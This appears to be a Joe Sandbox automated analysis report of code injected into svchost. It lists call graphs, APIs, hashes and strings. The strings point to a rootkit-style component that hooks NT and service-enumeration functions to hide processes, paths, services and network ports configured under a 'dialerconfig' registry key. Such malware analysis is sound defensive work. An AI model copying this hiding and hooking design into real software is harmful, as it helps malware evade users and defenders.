                                                        execution_graph 14790 26a8799273c 14792 26a8799276a 14790->14792 14791 26a87992858 LoadLibraryA 14791->14792 14792->14791 14793 26a879928d4 14792->14793 14794 26a879c1abc 14799 26a879c1628 GetProcessHeap 14794->14799 14796 26a879c1ad2 Sleep SleepEx 14797 26a879c1acb 14796->14797 14797->14796 14798 26a879c1598 StrCmpIW StrCmpW 14797->14798 14798->14797 14800 26a879c1648 _invalid_parameter_noinfo 14799->14800 14844 26a879c1268 GetProcessHeap 14800->14844 14802 26a879c1650 14803 26a879c1268 2 API calls 14802->14803 14804 26a879c1661 14803->14804 14805 26a879c1268 2 API calls 14804->14805 14806 26a879c166a 14805->14806 14807 26a879c1268 2 API calls 14806->14807 14808 26a879c1673 14807->14808 14809 26a879c168e RegOpenKeyExW 14808->14809 14810 26a879c18a6 14809->14810 14811 26a879c16c0 RegOpenKeyExW 14809->14811 14810->14797 14812 26a879c16e9 14811->14812 14813 26a879c16ff RegOpenKeyExW 14811->14813 14848 26a879c12bc RegQueryInfoKeyW 14812->14848 14814 26a879c1723 14813->14814 14815 26a879c173a RegOpenKeyExW 14813->14815 14859 26a879c104c RegQueryInfoKeyW 14814->14859 14819 26a879c1775 RegOpenKeyExW 14815->14819 14820 26a879c175e 14815->14820 14823 26a879c1799 14819->14823 14824 26a879c17b0 RegOpenKeyExW 14819->14824 14822 26a879c12bc 13 API calls 14820->14822 14825 26a879c176b RegCloseKey 14822->14825 14826 26a879c12bc 13 API calls 14823->14826 14827 26a879c17d4 14824->14827 14828 26a879c17eb RegOpenKeyExW 14824->14828 14825->14819 14831 26a879c17a6 RegCloseKey 14826->14831 14832 26a879c12bc 13 API calls 14827->14832 14829 26a879c1826 RegOpenKeyExW 14828->14829 14830 26a879c180f 14828->14830 14835 26a879c1861 RegOpenKeyExW 14829->14835 14836 26a879c184a 14829->14836 14834 26a879c104c 5 API calls 14830->14834 14831->14824 14833 26a879c17e1 RegCloseKey 14832->14833 14833->14828 14837 26a879c181c RegCloseKey 14834->14837 14839 26a879c1885 14835->14839 14840 26a879c189c RegCloseKey 14835->14840 14838 26a879c104c 5 API calls 14836->14838 14837->14829 14841 26a879c1857 RegCloseKey 14838->14841 14842 26a879c104c 5 API calls 14839->14842 14840->14810 14841->14835 14843 26a879c1892 RegCloseKey 14842->14843 14843->14840 14865 26a879d6168 14844->14865 14846 26a879c1283 GetProcessHeap 14847 26a879c12ae _invalid_parameter_noinfo 14846->14847 14847->14802 14849 26a879c1327 GetProcessHeap 14848->14849 14850 26a879c148a RegCloseKey 14848->14850 14853 26a879c133e _invalid_parameter_noinfo 14849->14853 14850->14813 14851 26a879c1476 GetProcessHeap HeapFree 14851->14850 14852 26a879c1352 RegEnumValueW 14852->14853 14853->14851 14853->14852 14855 26a879c13d3 GetProcessHeap 14853->14855 14856 26a879c141e lstrlenW GetProcessHeap 14853->14856 14857 26a879c13f3 GetProcessHeap HeapFree 14853->14857 14858 26a879c1443 StrCpyW 14853->14858 14866 26a879c152c 14853->14866 14855->14853 14856->14853 14857->14856 14858->14853 14860 26a879c11b5 RegCloseKey 14859->14860 14863 26a879c10bf _invalid_parameter_noinfo 14859->14863 14860->14815 14861 26a879c10cf RegEnumValueW 14861->14863 14862 26a879c114e GetProcessHeap 14862->14863 14863->14860 14863->14861 14863->14862 14864 26a879c116e GetProcessHeap HeapFree 14863->14864 14864->14863 14867 26a879c157c 14866->14867 14870 26a879c1546 14866->14870 14867->14853 14868 26a879c1565 StrCmpW 14868->14870 14869 26a879c155d StrCmpIW 14869->14870 14870->14867 14870->14868 14870->14869

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 8b3f40dc757b03efebebe1ec2b21d8ee4b81ef9a05be350be4598fcd48a0c6e5
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 99715D76310E1086EF90DF66E89869D3BB4FB85B88F405111EE4E67B68EF3AC444CB45

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: bbd561d3a30add4c1150a9458a01d63078364739115671f5aea34e55c8598808
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 0211807261064182FFE0AB22F90D35D36A4A7D4385FD04124EA0EA3696EFBBC0849F13

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0000026A879C1628: GetProcessHeap.KERNEL32 ref: 0000026A879C1633
                                                          • Part of subcall function 0000026A879C1628: HeapAlloc.KERNEL32 ref: 0000026A879C1642
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16B2
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DF
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C16F9
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1719
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1734
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1754
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C176F
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C178F
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17AA
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17CA
                                                        • Sleep.KERNEL32 ref: 0000026A879C1AD7
                                                        • SleepEx.KERNELBASE ref: 0000026A879C1ADD
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17E5
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1805
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1820
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1840
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C185B
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C187B
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1896
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C18A0
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 5eed58e8f7c032d1df488f6ec5371d2936970acb8e97615792f8d803c15a43b0
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 2931E5F5240A4581FFD0AB26DA493BD73A4ABC4BD0F0454219E09A77DAFF26C491CE1A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 110 26a8799273c-26a879927a4 call 26a879929d4 * 4 119 26a879929b2 110->119 120 26a879927aa-26a879927ad 110->120 121 26a879929b4-26a879929d0 119->121 120->119 122 26a879927b3-26a879927b6 120->122 122->119 123 26a879927bc-26a879927bf 122->123 123->119 124 26a879927c5-26a879927e6 123->124 124->119 126 26a879927ec-26a8799280c 124->126 127 26a87992838-26a8799283f 126->127 128 26a8799280e-26a87992836 126->128 129 26a87992845-26a87992852 127->129 130 26a879928df-26a879928e6 127->130 128->127 128->128 129->130 131 26a87992858-26a8799286a LoadLibraryA 129->131 132 26a87992992-26a879929b0 130->132 133 26a879928ec-26a87992901 130->133 135 26a879928ca-26a879928d2 131->135 136 26a8799286c-26a87992878 131->136 132->121 133->132 134 26a87992907 133->134 137 26a8799290d-26a87992921 134->137 135->131 139 26a879928d4-26a879928d9 135->139 138 26a879928c5-26a879928c8 136->138 141 26a87992923-26a87992934 137->141 142 26a87992982-26a8799298c 137->142 138->135 143 26a8799287a-26a8799287d 138->143 139->130 145 26a87992936-26a8799293d 141->145 146 26a8799293f-26a87992943 141->146 142->132 142->137 147 26a879928a7-26a879928b7 143->147 148 26a8799287f-26a879928a5 143->148 149 26a87992970-26a87992980 145->149 150 26a87992945-26a8799294b 146->150 151 26a8799294d-26a87992951 146->151 152 26a879928ba-26a879928c1 147->152 148->152 149->141 149->142 150->149 153 26a87992963-26a87992967 151->153 154 26a87992953-26a87992961 151->154 152->138 153->149 156 26a87992969-26a8799296c 153->156 154->149 156->149
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 57387411ffdeb412b963753acb60f61000c0759ef6c355c86f1a01fa76b5fc3d
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: B5613532B016908BFB94CF15D10872DF3A6FB54BA4F588121DF59277C8DA39D892CB01

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 363 26a879c2b2c-26a879c2ba5 call 26a879e2ce0 366 26a879c2ee0-26a879c2f03 363->366 367 26a879c2bab-26a879c2bb1 363->367 367->366 368 26a879c2bb7-26a879c2bba 367->368 368->366 369 26a879c2bc0-26a879c2bc3 368->369 369->366 370 26a879c2bc9-26a879c2bd9 GetModuleHandleA 369->370 371 26a879c2bdb-26a879c2beb call 26a879d6090 370->371 372 26a879c2bed 370->372 373 26a879c2bf0-26a879c2c0e 371->373 372->373 373->366 377 26a879c2c14-26a879c2c33 StrCmpNIW 373->377 377->366 378 26a879c2c39-26a879c2c3d 377->378 378->366 379 26a879c2c43-26a879c2c4d 378->379 379->366 380 26a879c2c53-26a879c2c5a 379->380 380->366 381 26a879c2c60-26a879c2c73 380->381 382 26a879c2c83 381->382 383 26a879c2c75-26a879c2c81 381->383 384 26a879c2c86-26a879c2c8a 382->384 383->384 385 26a879c2c9a 384->385 386 26a879c2c8c-26a879c2c98 384->386 387 26a879c2c9d-26a879c2ca7 385->387 386->387 388 26a879c2d9d-26a879c2da1 387->388 389 26a879c2cad-26a879c2cb0 387->389 392 26a879c2da7-26a879c2daa 388->392 393 26a879c2ed2-26a879c2eda 388->393 390 26a879c2cc2-26a879c2ccc 389->390 391 26a879c2cb2-26a879c2cbf call 26a879c199c 389->391 395 26a879c2cce-26a879c2cdb 390->395 396 26a879c2d00-26a879c2d0a 390->396 391->390 397 26a879c2dbb-26a879c2dc5 392->397 398 26a879c2dac-26a879c2db8 call 26a879c199c 392->398 393->366 393->381 395->396 402 26a879c2cdd-26a879c2cea 395->402 403 26a879c2d3a-26a879c2d3d 396->403 404 26a879c2d0c-26a879c2d19 396->404 399 26a879c2dc7-26a879c2dd4 397->399 400 26a879c2df5-26a879c2df8 397->400 398->397 399->400 406 26a879c2dd6-26a879c2de3 399->406 407 26a879c2e05-26a879c2e12 lstrlenW 400->407 408 26a879c2dfa-26a879c2e03 call 26a879c1bbc 400->408 409 26a879c2ced-26a879c2cf3 402->409 411 26a879c2d3f-26a879c2d49 call 26a879c1bbc 403->411 412 26a879c2d4b-26a879c2d58 lstrlenW 403->412 404->403 410 26a879c2d1b-26a879c2d28 404->410 414 26a879c2de6-26a879c2dec 406->414 420 26a879c2e14-26a879c2e1e 407->420 421 26a879c2e35-26a879c2e3f call 26a879c3844 407->421 408->407 426 26a879c2e4a-26a879c2e55 408->426 418 26a879c2cf9-26a879c2cfe 409->418 419 26a879c2d93-26a879c2d98 409->419 422 26a879c2d2b-26a879c2d31 410->422 411->412 411->419 415 26a879c2d5a-26a879c2d64 412->415 416 26a879c2d7b-26a879c2d8d call 26a879c3844 412->416 425 26a879c2dee-26a879c2df3 414->425 414->426 415->416 427 26a879c2d66-26a879c2d79 call 26a879c152c 415->427 416->419 430 26a879c2e42-26a879c2e44 416->430 418->396 418->409 419->430 420->421 431 26a879c2e20-26a879c2e33 call 26a879c152c 420->431 421->430 422->419 432 26a879c2d33-26a879c2d38 422->432 425->400 425->414 434 26a879c2e57-26a879c2e5b 426->434 435 26a879c2ecc-26a879c2ed0 426->435 427->416 427->419 430->393 430->426 431->421 431->426 432->403 432->422 440 26a879c2e63-26a879c2e7d call 26a879c85c0 434->440 441 26a879c2e5d-26a879c2e61 434->441 435->393 444 26a879c2e80-26a879c2e83 440->444 441->440 441->444 447 26a879c2ea6-26a879c2ea9 444->447 448 26a879c2e85-26a879c2ea3 call 26a879c85c0 444->448 447->435 450 26a879c2eab-26a879c2ec9 call 26a879c85c0 447->450 448->447 450->435
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 28832ac34e84ece53f7b50bb78eaf8a37b486e288825972d32e086a5872c7075
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 42B17A76210A9082EFE8DF25D4487AD77A5FB94B84F445026EE0977798EF36CC80CB42
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 938e5285386ac3705a1524c506204be3636963da77c64c4e1ce6b6d8eddc6828
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 50315072205B808AEBA0DF60E8847ED7B64F785744F44442AEB4D67B98EF39C548CB11
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: d1d1b9292f01f4f5fbfa14a2dc646865464e2607e4ff46e76a86c3c994235719
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: DC318132214F8086EBA0DF25E88439E7BA4F7C9798F540126EA9D53B98EF39C545CF01

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 07cfe981894990384c0c086665b30c926e9edc38e061a20603f020415e03ff94
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 70514A76204B8486EB94CF62E54835EBFA1F78AFD9F048124EA4A57758EF3DC049CB01

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: dfe63a10a49480e1aef6057fb1ce33c2d81f6763df8e5d6cfa68f1b74ee8636c
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: EF31C8B5144A4AA0FE94EF65E85A7EC3B24F784348FC04013954933176AFBEC289CF92

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: b047a768bb49e332fa12a0d509f504b7dc68172f8f015219012fb81a31179565
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: DB81D23170524186FBD0EF65944D39D72E1EB87780F588425AA0977796EF3BC9868F03

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 0000026A879CCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCEBC
                                                        • SetLastError.KERNEL32 ref: 0000026A879CCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,0000026A879CECCC,?,?,?,?,0000026A879CBF9F,?,?,?,?,?,0000026A879C7AB0), ref: 0000026A879CCF2C
                                                          • Part of subcall function 0000026A879CD6CC: HeapAlloc.KERNEL32 ref: 0000026A879CD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF54
                                                          • Part of subcall function 0000026A879CD744: HeapFree.KERNEL32 ref: 0000026A879CD75A
                                                          • Part of subcall function 0000026A879CD744: GetLastError.KERNEL32 ref: 0000026A879CD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF76
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: fbbfd203b105abf8085660589179a2c6459f60e277cac02fd6d43f7fad114619
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: F941B13234164882FEF8A735565E37D36965BC67B0F640724A936377E6EE2BC8019E03

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: b02012d5428b01c1f3b2143805af3d2ef8a5ba1a4c44cc927d8b5d08adb94f93
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 8C213836618A4082EB50CB25F44836E7BA1F78ABE4F544215EA5913AA8DF7DC189CF02

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 444f81f33de08ab68ee44032b3efa5b7945037919697de8df49d031d9224469b
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: E2E1C172604B80CAEFA0DF65D58939D77A0F799BA8F100116EE8967B99CB35C581CF02

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 1f6ce65c737b67c16a74770dcca6a547431568ee9d47403595349a7bcceb887e
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 97E1D572605B408AFBA0DF65D48839D77B4F7A97A8F100116EE8D67B99DB36C091CF02

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: e22ce2f0d6908cfb41650f8e3b1f78ec9287b8d585868ecd0f1c06e4ba5b9ad5
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 5D41E633311A0091FE96DB56A80CB5D3BA6F785BE0F5941299D0DAB784EE3AC4458B02

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: f1e6073484f6787d024fb048a9424189236bd7d4ebebf72dc42381622d64dea6
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 76417173214B84C6EBA0CF61E44839E7BA1F389B98F448129EA8917758EF3DC585CB01

                                                        Control-flow Graph

                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD087
